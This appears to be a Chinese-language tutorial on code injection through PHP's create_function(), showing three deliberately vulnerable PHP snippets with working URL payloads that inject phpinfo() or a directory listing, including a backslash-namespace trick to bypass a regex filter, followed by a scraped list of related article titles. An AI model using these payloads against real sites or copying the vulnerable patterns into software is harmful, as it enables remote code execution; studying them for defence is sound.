0x00 create_function()介绍

create_function()创建匿名函数

string create_function ( string $args , string $code )

string

code 方法代码部分

举例:

create_function('$name','echo $name."A"')

类似于:

function name($name) {

echo $name."A";

}

0x01 漏洞利用

1

//02-8.php?id=2;}phpinfo();/*

$id=$_GET['id'];

$str2='echo '.$a.'test'.$id.";";

echo $str2;

echo "
";

echo "==============================";

echo "
";

$f1 = create_function('$a',$str2);

echo "
";

echo "==============================";

?>

payload:

http://localhost/libtest/02-8.php?id=2;}phpinfo();/*

原理:

id=2;}phpinfo();/*

执行函数为:

源代码:

function fT($a) {

echo "test".$a;

}

注入后代码:

function fT($a) {

echo "test";}

phpinfo();/*;//此处为注入代码。

}

2

//how to exp this code

$sort_by=$_GET['sort_by'];

$sorter='strnatcasecmp';

$databases=array('test','test');

$sort_function = ' return 1 * ' . $sorter . '($a["' . $sort_by . '"], $b["' . $sort_by . '"]);';

usort($databases, create_function('$a, $b', $sort_function));

?>

payload:

func.php?sort_by="]);}phpinfo();/*

3

error_reporting(0);

if(isset($_GET['action'])){

$action=$_GET['action'];

}

if(isset($_GET['action'])){

$arg=$_GET['arg'];

}

if(preg_match('/^[a-z0-9_]*$/isD',$action)){

show_sourse(_FILE_);

}else{

$action($arg,'');

}

?>

正则绕过,数字字母下划线都被禁止.

思路就是在开头或结尾插入字符绕过检测,涉及到php全局命名空间:在函数的头部加上 \就是调用全局的此函数,即\create_function()就是调用全局的create_function()函数,同时函数头部加上\可绕过正则过滤,\即%5c.

漏洞利用处

arg,'');,也就是说如果利用create_function()函数漏洞,这里是参数为GET值,执行代码为空

payload:

ip/?action=%5ccreate_function&arg=){}var_dump(scandir("./"));/*

php 命名空间 create_function,PHP create_function()注入命令执行漏洞相关推荐

  1. 【Web安全】DVWA之Command injection(命令执行漏洞)探索

    文章目录 1 命令行注入 2 low 3 Medium 4 Middle 5 Impossible 1 命令行注入 命令执行漏洞的原理:在操作系统中, & .&& .| . | ...

  2. php post 漏洞_文件包含上传漏洞目录遍历命令执行漏洞

    制丨阿星 来源丨freebuff 作者丨Deutsh 文件上传漏洞: 一句话木马 一句话木马主要由两部分组成:执行函数与 接收被执行代码的变量 执行函数: eval() assert() create ...

  3. PHP代码/命令执行漏洞总结

    目录 0x00 代码执行相关函数 1.mixed eval(string code_str) 2.bool assert ( mixed $assertion [, string $descripti ...

  4. 第30天-WEB 漏洞-RCE 代码及命令执行漏洞全解

    在 Web 应用中有时候程序员为了考虑灵活性.简洁性,会在代码调用代码或命令执行函数去处理.比如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞.同样 ...

  5. struts2漏洞_十大常见web漏洞——命令执行漏洞

    命令执行漏洞在不同框架下都有存在,也是十分普遍且危害极大,下面我们介绍一个最具代表性的,也是影响范围最大的一个命令执行漏洞--Struts2远程代码执行漏洞. Struts2 漏洞介绍 ApacheS ...

  6. SpringMessaging命令执行漏洞 cve-2018-1270

    漏洞概述 https://pivotal.io/security/cve-2018-1270 STOMP(Simple Text Orientated Messaging Protocol)全称为简单 ...

  7. 【安全漏洞】Rocket.Chat 远程命令执行漏洞分析

    简述 Rocket.Chat 是一个开源的完全可定制的通信平台,由 Javascript 开发,适用于具有高标准数据保护的组织. 2021年3月19日,该漏洞在 HackerOne 被提出,于2021 ...

  8. 命令执行——命令执行漏洞概述(一)

    普及内容 了解命令执行定义 了解命令执行条件 掌握命令执行成因 了解命令执行危害 掌握命令执行实例 掌握管道符号和通用命令符 了解命令执行常见场景 基础概念 命令执行定义 基本定义 命令执行漏洞是指攻 ...

  9. 漏洞payload 靶机_学生会私房菜【20200707期】Wordpress 4.6 任意命令执行漏洞

    学生会私房菜 学生会私房菜是通过学生会信箱收集同学们的来稿,挑选其中的优质文档,不定期进行文档推送的主题. 本期文档内容为:<Wordpress 4.6 任意命令执行漏洞> 作者介绍:AT ...

最新文章

  1. 分布式系统性能监控工具,初探Pinpoint Agent启动源码
  2. 2017年10月31日结束Outlook 2007与Office 365的连接
  3. 关于Jsoup解析https网页的问题
  4. 辗转相除法的程序实现
  5. php fsockopen socket,PHP利用socket(fsockopen)的简单示例
  6. ruby中的回调方法和钩子方法
  7. 3.13 判读是否是对称素数
  8. Spring 框架 DAO 与 事务 的总结
  9. dns日志级别 linux,linux下DNS服务器视图view及日志系统详解
  10. js中的charAt,indexOf
  11. aws rds监控慢sql_估算AWS RDS SQL Server成本
  12. 优客365 v2.9版本 后台存在SQL注入
  13. AWK中BEGIN和END的使用理解
  14. C++PrimerPlus 第六章 分支语句和逻辑运算符 - 6.1 if语句
  15. 冰点还原容易出现的问题总结
  16. 自变量与因变量相关分析不显著能做回归分析吗?
  17. netbeans java中文_netbeans中文乱码解决方案
  18. 淘宝粉丝能买吗?怎么加最快
  19. c语言str相关的函数
  20. roc曲线spss怎么做_SPSS单因素ROC曲线及多因素联合诊断ROC曲线绘制(原创手把手) - 医学统计和生物统计讨论版 -丁香园论坛...

热门文章

  1. 服务器手工修改虚拟内存,服务器修改虚拟内存
  2. 解决Ubuntu,su: 认证失败
  3. python的烦恼_还在为每天忘记签到而烦恼吗?python来帮你搞定!
  4. Python教程:json中encode与decode区别
  5. python中的set函数、列表的操作
  6. 用Python求出:1到某个数的奇数序列里一共出现了多少个3
  7. Python 中,字符串连接效率最高的方式是?一定出乎你的意料
  8. 使用python进行面部合成,比PS好用多了
  9. java 判断 中文字符_java中判断字符串中是否有中文字符
  10. java 增量,Java增量运算符查询(++ i和i ++)